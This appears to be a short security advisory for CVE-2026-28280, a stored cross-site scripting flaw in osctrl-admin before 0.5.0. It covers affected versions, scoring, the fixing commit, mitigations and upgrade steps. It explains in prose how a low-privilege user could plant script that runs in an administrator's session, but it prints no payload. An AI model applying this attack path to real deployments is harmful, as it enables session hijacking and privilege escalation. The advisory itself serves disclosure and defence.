Stored Cross-Site Scripting (XSS) in osctrl-admin On-Demand Query List
Vulnerability ID: CVE-2026-28280
CVSS Score: 6.1
Published: 2026-02-28
A Stored Cross-Site Scripting (XSS) vulnerability exists in the osctrl-admin component of osctrl versions prior to 0.5.0. The vulnerability allows authenticated users with low-level 'query' permissions to inject malicious JavaScript via the on-demand query interface. These payloads are stored in the backend database and subsequently rendered without sufficient context-aware encoding in the administrative dashboard. When an administrator views the query history, the script executes, potentially leading to session hijacking or privilege escalation.
TL;DR
osctrl-admin < 0.5.0 contains a Stored XSS vulnerability. Low-privilege users can inject JavaScript into query logs, which execute when admins view the On-Demand Query List. Fixed in version 0.5.0.
⚠️ Exploit Status: POC
Technical Details
- CWE ID: CWE-79
- Attack Vector: Network
- CVSS Score: 6.1 (Medium)
- EPSS Score: 0.00023
- Impact: High (Confidentiality/Integrity)
- Exploit Status: PoC Available
Affected Systems
- osctrl-admin < 0.5.0
-
osctrl: < 0.5.0 (Fixed in:
0.5.0)
Code Analysis
Commit: b478377
Sanitized query in on-demand query list
Code changes implementing context-aware encoding for query display.
Exploit Details
- NVD: Vulnerability details and analysis
Mitigation Strategies
- Upgrade to patched version
- Input Validation
- Output Encoding
- Principle of Least Privilege
Remediation Steps:
- Pull the latest docker images or binaries for osctrl v0.5.0.
- Redeploy the osctrl-admin service.
- Verify the fix by attempting to save a query containing HTML tags (e.g., 'test') and observing that it renders as literal text.
References
Read the full report for CVE-2026-28280 on our website for more details including interactive diagrams and full exploit analysis.
Top comments (0)